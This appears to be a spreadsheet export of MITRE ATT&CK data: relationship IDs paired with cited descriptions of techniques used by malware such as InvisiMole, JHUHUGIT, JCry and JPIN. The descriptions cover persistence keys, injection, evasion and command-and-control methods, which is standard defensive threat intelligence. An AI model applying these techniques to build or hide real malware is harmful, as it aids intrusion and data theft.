  <si>
    <t>relationship--1f728f8c-8aee-4d40-9161-1cae773983d1</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has deleted files and directories including XML and files successfully uploaded to C2 servers.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--1f06f614-8f5a-4666-9fa5-fcda1535f97d</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</si>
  <si>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</si>
  <si>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relationship--aef68e46-d1e1-49b9-aade-6c1bf226e053</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can create hidden system directories.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--6390419e-ebaa-4556-ae74-c92dc041eb47</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has executed legitimate tools in hidden windows.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--cc1a0331-2b30-489c-ab4d-8853cff3a0b0</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has undergone regular technical improvements in an attempt to evade detection.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--f0894796-a4ed-48c4-94fc-7fc42175416d</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can upload files to the victim's machine for operations.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--b7760f6b-9b57-4fa8-895a-4f4a209aa366</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can can remove all system restore points.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>relationship--0e9818a5-90ec-4b12-a6e2-20188d78a69f</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can function as a proxy to create a server that relays communication between the client and C&amp;C server, or between two clients.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>relationship--90974f03-7f61-479e-bceb-6f26872d4812</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use a JavaScript file as part of its execution chain.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--7105dbb9-fcb2-41f7-a740-a19d539758fb</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can capture keystrokes on a compromised host.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--50001cfb-68b5-423c-9c18-6c26f6daad3f</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used ListPlanting to inject code into a trusted process.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--8cfdd4d6-1696-401a-9455-d3fbf6bc0235</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has a command to list account information on the victim’s machine.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>relationship--ab3fe31a-051e-4db5-bcf0-20a93b4bae9b</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) determines a working directory where it stores all the gathered data about the compromised machine.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--59193fff-6bea-41c6-b744-36850e6cc39a</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can deliver trojanized versions of software and documents, relying on user execution.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--dfea2d53-ecf8-4e01-9773-98d65c57bcc8</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has attempted to disguise itself by registering under a seemingly legitimate service name.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--ed3d84f6-542f-418b-9769-4bfd10246371</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</si>
  <si>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</si>
  <si>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relationship--fabd053f-487c-404f-b1b0-b090e442ff83</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has a command to create, set, copy, or delete a specified Registry key or value.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--66f5e718-f910-487f-852a-98a8d752b0ba</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use winapiexec tool for indirect execution of  &lt;code&gt;ShellExecuteW&lt;/code&gt; and &lt;code&gt;CreateProcessA&lt;/code&gt;.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--fd93333d-ec77-4f0d-be90-64860d67bdf5</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can scan the network for open ports and vulnerable instances of RDP and SMB protocols.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--ddede021-d8bc-4303-9915-5b2dd0ebd4cd</t>
  </si>
  <si>
    <t xml:space="preserve">
[InvisiMole](https://attack.mitre.org/software/S0260) can disconnect previously connected remote drives.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>relationship--c5d67c9b-f8de-420a-ad05-3691ca001b64</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can gather network share information.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>relationship--e1d0ec8e-0970-4737-9605-1cf8a3ba1371</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used TCP to download additional modules.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--3957be97-305f-4d42-9978-868cb83918a2</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use a modified base32 encoding to encode data within the subdomain of C2 requests.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--657cb17c-b227-4f97-a19a-e1b0fb7c839d</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) avoids analysis by encrypting all strings, internal files, configuration data and by using a custom executable format.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--9e8f8dce-1921-4738-ae7f-30290a350cf2</t>
  </si>
  <si>
    <t xml:space="preserve">[InvisiMole](https://attack.mitre.org/software/S0260) can inject its backdoor as a portable executable into a target process.(Citation: ESET InvisiMole June 2020)	</t>
  </si>
  <si>
    <t>relationship--0ed82dd2-9b78-49a7-990b-d59ad7fa40a1</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can obtain a list of running processes.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--eb1c808f-5806-4169-bd41-6ea7c7f17ffb</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can inject itself into another process to avoid detection including use of a technique called ListPlanting that customizes the sorting algorithm in a ListView structure.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--90eb6858-e561-4ed0-855b-f9afbe3ac394</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can mimic HTTP protocol with custom HTTP “verbs” HIDE, ZVVP, and NOP.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--c0011483-66e7-4f74-a397-d391efc421dc</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can enumerate Registry values, keys, and data.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>relationship--fdb02bf4-a950-4ae7-b07c-a3ed0322ef6e</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can place a lnk file in the Startup Folder to achieve persistence.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--3434121e-a4d6-43a7-b905-78c52f5a12bd</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used rundll32.exe for execution.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--0ab3b4aa-55d9-44bb-8563-d7e614641d5a</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used scheduled tasks named &lt;code&gt;MSST&lt;/code&gt; and &lt;code&gt;\Microsoft\Windows\Autochk\Scheduled&lt;/code&gt; to establish persistence.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--e19d37dd-2cee-488b-a05e-1d298eb090cf</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can capture screenshots of not only the entire screen, but of each separate window open, in case they are overlapping.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--45a1721f-67a3-479a-befe-d136ed0fdad3</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can check for the presence of network sniffers, AV, and BitDefender firewall.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--da7dbcec-4714-4bca-8b90-d3a0a95576d9</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used Windows services as a way to execute its malicious payload.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--1b92df4d-d064-4615-b27d-cf4d53ecc97b</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use a .lnk shortcut for the Control Panel to establish persistence.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--db61e886-9295-4df7-a9db-25d7b9879b82</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can collect information about installed software used by specific users, software executed on user login, and software executed by each system.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--af7ec7e9-08d2-4459-8c05-047185799058</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) uses variations of a simple XOR encryption routine for C&amp;C communications.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>relationship--03927dc7-2ef0-43e4-ad71-94243e29bca4</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can check for artifacts of VirtualBox, Virtual PC and VMware environment, and terminate itself if they are detected.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--13aed490-7d1f-4839-90c9-32d587d58afd</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can gather information on the mapped drives, OS version, computer name, DEP policy, memory size, and system volume serial number.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--9154afb8-abf6-4d9d-b114-5106d801338f</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) gathers information on the IP forwarding table, MAC address, configured proxy, and network SSID.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--7e860d9b-29fd-4acf-b624-076a0c60b9df</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) lists local users and session information.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>relationship--524261f3-8b87-4c99-b99b-1e78032f072c</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can obtain running services on the victim.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>relationship--7be0437f-1d0d-4df0-9e66-70e581cc5f1a</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) gathers the local system time from the victim’s machine.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--e0292b89-50c2-4b62-8471-6a1b27dc7fc3</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can replace legitimate software or documents in the compromised network with their trojanized versions, in an attempt to propagate itself within the network.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--cd99a29c-0364-4d56-97ff-97542ff76fde</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) samples were timestomped by the authors by setting the PE timestamps to all zero values. [InvisiMole](https://attack.mitre.org/software/S0260) also has a built-in command to modify file times.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>relationship--b039a79c-8df3-4e89-95ad-03d27b16a13c</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can remotely activate the victim’s webcam to capture content.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--d2067a75-0d5d-4899-9d9f-6537d98296c1</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) uses HTTP for C2 communications.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>relationship--e1b4887c-37ac-4470-88d5-ece2bfa6477e</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can launch a remote shell to execute commands.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--9256370f-60b2-4ab5-9a23-28c8cde73026</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can register a Windows service named CsPower as part of its execution chain, and a Windows service named clr_optimization_v2.0.51527_X86 to achieve persistence.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>relationship--9aeb640c-a961-4694-a965-349b4d70b8ee</t>
  </si>
  <si>
    <t>[Invoke-PSImage](https://attack.mitre.org/software/S0231) can be used to embed payload data within a new image file.(Citation: GitHub PSImage)</t>
  </si>
  <si>
    <t>relationship--e3b299d0-fbc0-445f-a0d0-b3fdaa572917</t>
  </si>
  <si>
    <t>[Invoke-PSImage](https://attack.mitre.org/software/S0231) can be used to embed a PowerShell script within the pixels of a PNG file.(Citation: GitHub Invoke-PSImage)</t>
  </si>
  <si>
    <t>relationship--c09c2f08-3bda-4af7-9578-01fa1c7fba2c</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) has the ability to decrypt embedded .NET and PE payloads.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>relationship--b16b1e0e-63b0-4c5b-8809-476d9645948c</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) has the ability to inject a DLL into running processes, including the [IronNetInjector](https://attack.mitre.org/software/S0581) DLL into explorer.exe.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>relationship--c4e3450c-c657-43c3-b825-031b12a33611</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) has been disguised as a legitimate service using the name PythonUpdateSrvc.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>relationship--8d305ed1-3ac5-4431-ae3c-766d430d9d5f</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) can obfuscate variable names, encrypt strings, as well as base64 encode and Rijndael encrypt payloads.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>relationship--e842c832-8e3a-487c-bdde-e1614fec6c7e</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</si>
  <si>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</si>
  <si>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relationship--10b4ef89-5f69-4809-a410-37256407b5fa</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) can use an IronPython scripts to load a .NET injector to inject a payload into its own or a remote process.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>relationship--14d60e02-4ceb-4972-844c-412e9599144f</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) can use IronPython scripts to load payloads with the help of a .NET injector.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>relationship--02f18eff-faf1-421b-a0e9-e9852833bb04</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) has used a task XML file named &lt;code&gt;mssch.xml&lt;/code&gt; to run an IronPython script when a user logs in or when specific system events are created.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>relationship--8fb40ded-3a84-48ad-ab52-342cf2ab629e</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can collect data from a local system.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--c9b37055-af2b-4ec1-857c-79adfb290d66</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) has a command to delete a file from the machine.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--44968df5-3af9-4441-a1f3-e91c75893e64</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can list file and directory information.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--b7999bd1-4704-489d-8fc3-80661592b6dc</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) sets its own executable file's attributes to hidden.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--7fd0dc68-66b1-482a-b3bd-3037bb0045cb</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can download and execute additional files.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--79b980bb-f79e-4576-b927-be52be236f15</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) has used registry values and file names associated with Adobe software, such as AcroRd32.exe.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--ea606b59-74e1-495c-a93d-c04418d86eb6</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can list running processes.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--1e0fdaa6-7a6f-4bd6-a1ef-3ee85d1d89b2</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can achieve persistence by adding itself to the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--4ad60c58-2665-4c4b-a9e8-5cd0042e45bb</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) uses custom Base64 encoding schemes to obfuscate command and control traffic in the message body of HTTP requests.(Citation: Moran 2013)(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--96076f66-3ad6-4e54-b816-c9c3f90fa43a</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) collects the computer name of the victim's system during the initial infection.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--5eb5ee0e-d186-40d3-a433-9562f85fdf6b</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) enumerates the IP address, network proxy settings, and domain name from a victim's system.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--69195872-b722-4b65-b8fd-27bab7bf4d32</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) collects the username from the victim’s machine.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--dfa0d5cd-0e3d-4e21-ad3f-3653134cfa8b</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can list running services.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--bedf5d77-af37-4a10-b4d7-3555a9ea2938</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) uses HTTP for command and control.(Citation: Moran 2013)(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--27d4f0a9-7f8f-4d3d-b130-fd096bede2e9</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) is capable of executing commands via [cmd](https://attack.mitre.org/software/S0106).(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--ec0ffb41-2adb-4416-8869-5b99e61615c2</t>
  </si>
  <si>
    <t>S0389</t>
  </si>
  <si>
    <t>JCry</t>
  </si>
  <si>
    <t>malware--aaf3fa65-8b27-4e68-91de-2b7738fe4c82</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has encrypted files and demanded Bitcoin to decrypt those files. (Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>relationship--164aec0b-1e3e-4e79-b9c3-43d602a1674a</t>
  </si>
  <si>
    <t xml:space="preserve">[JCry](https://attack.mitre.org/software/S0389) has been observed deleting shadow copies to ensure that data cannot be restored easily.(Citation: Carbon Black JCry May 2019)	</t>
  </si>
  <si>
    <t>relationship--f0c94372-2818-46ff-899c-0c57fe0af46a</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has achieved execution by luring users to click on a file that appeared to be an Adobe Flash Player update installer. (Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>relationship--ac8ba4ea-f9dc-4d0c-85d9-0df3041fd304</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has used PowerShell to execute payloads.(Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>relationship--398a5e5a-b624-4992-b26c-2abb37c9c2db</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has created payloads in the Startup directory to maintain persistence. (Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>relationship--1ffba98c-788b-47e0-a67c-9d3700e86ec5</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has used VBS scripts. (Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>relationship--8dad8f08-ade1-4a1b-a8e5-718c94afc585</t>
  </si>
  <si>
    <t xml:space="preserve">[JCry](https://attack.mitre.org/software/S0389) has used &lt;code&gt;cmd.exe&lt;/code&gt; to launch PowerShell.(Citation: Carbon Black JCry May 2019)	</t>
  </si>
  <si>
    <t>relationship--b2463427-0ad2-426b-b8e3-fcae5347a545</t>
  </si>
  <si>
    <t>A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant accesses a screenshot saved in the clipboard and converts it to a JPG image.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>relationship--83aac36d-6dfa-4c27-b1b1-c200c9240eb9</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</si>
  <si>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</si>
  <si>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relationship--988cb889-b385-4e8f-be06-7d41c4da0dd7</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges.(Citation: ESET Sednit Part 1)(Citation: ESET Sednit July 2015)</t>
  </si>
  <si>
    <t>relationship--976202db-cdfa-4c4e-bc09-9b3cad90e6fb</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</si>
  <si>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</si>
  <si>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relationship--0d43f3a7-70ed-4d04-857e-3a9fbce86cfb</t>
  </si>
  <si>
    <t>The [JHUHUGIT](https://attack.mitre.org/software/S0044) dropper can delete itself from the victim. Another [JHUHUGIT](https://attack.mitre.org/software/S0044) variant has the capability to delete specified files.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>relationship--edaa004e-8239-40d8-a4f0-8849c4f0e87f</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</si>
  <si>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</si>
  <si>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relationship--f39d9e4d-b4f9-4c12-aa8e-a44f8550b57f</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has registered a Windows shell script under the Registry key &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; to establish persistence.(Citation: ESET Sednit Part 1)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>relationship--70d5a73c-cc14-410a-a430-5948cd21532f</t>
  </si>
  <si>
    <t>Many strings in [JHUHUGIT](https://attack.mitre.org/software/S0044) are obfuscated with a XOR algorithm.(Citation: F-Secure Sofacy 2015)(Citation: ESET Sednit Part 1)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>relationship--ae1ee1dc-6017-4177-b34c-70db166a939e</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) obtains a list of running processes on the victim.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>relationship--1923a47b-5a48-44e6-883f-ca23a96fea46</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) performs code injection injecting its own functions to browser processes.(Citation: F-Secure Sofacy 2015)(Citation: Unit 42 Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>relationship--da44c85c-914b-41e0-aef7-68cd3c1faea1</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process.(Citation: ESET Sednit Part 1)</t>
  </si>
  <si>
    <t>relationship--5d0263d9-ddd3-4195-96ae-e340caef9e0e</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) is executed using rundll32.exe.(Citation: F-Secure Sofacy 2015)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>relationship--dd9c1644-259d-4980-8058-fdc3c72fac7b</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has registered itself as a scheduled task to run each time the current user logs in.(Citation: ESET Sednit Part 1)(Citation: ESET Sednit July 2015)</t>
  </si>
  <si>
    <t>relationship--1aa10371-6473-416a-8b8b-17c36f700233</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</si>
  <si>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</si>
  <si>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relationship--073215cd-bc1e-48e8-8f3a-7d24f18b32c6</t>
  </si>
  <si>
    <t>A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant encodes C2 POST data base64.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>relationship--27e7969b-a0bf-4db6-90bf-1f17c5e0c853</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</si>
  <si>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</si>
  <si>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relationship--e11d4f32-842a-4684-8974-f368e52b8632</t>
  </si>
  <si>
    <t>A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant gathers network interface card information.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>relationship--1993ee53-26a0-4cd1-8a93-5fd578c941fc</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) variants have communicated with C2 servers over HTTP and HTTPS.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>relationship--4a4a5d60-ec17-49a2-b651-ea8918410fc2</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) uses a .bat file to execute a .dll.(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>relationship--8d788563-901e-4002-a599-826840b00d39</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has registered itself as a service to establish persistence.(Citation: ESET Sednit Part 1)</t>
  </si>
  <si>
    <t>relationship--b0099b28-bcb8-4214-8166-d9caed1b6491</t>
  </si>
  <si>
    <t>A [JPIN](https://attack.mitre.org/software/S0201) variant downloads the backdoor payload via the BITS service.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--45d8c4f2-27e4-4063-9eec-d8023c61c74b</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can lower security settings by changing Registry keys.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--4e66aad2-7c30-4c05-9f8e-767ac1cff08e</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201)'s installer/uninstaller component deletes itself if it encounters a version of Windows earlier than Windows XP or identifies security-related processes running.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--31bd2260-ef8d-4f69-a7a8-9388e0d721c9</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can communicate over FTP.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--7bde54d7-257c-4c68-920e-bd78fe282f14</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can enumerate drives and their types. It can also change file permissions using cacls.exe.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--4ffd0780-b8ed-4b8f-b5b8-ff5b0afd4f1f</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can download files and upgrade itself.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--74c1fa45-5ac3-47a0-a442-2cc5e89f7b4c</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) contains a custom keylogger.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--78da5fc8-6f66-43a5-8ad4-c9c79b506408</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can obtain the permissions of the victim user.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--21fdaa87-7b0e-4ad9-a612-c4d2ec8789d7</t>
  </si>
  <si>
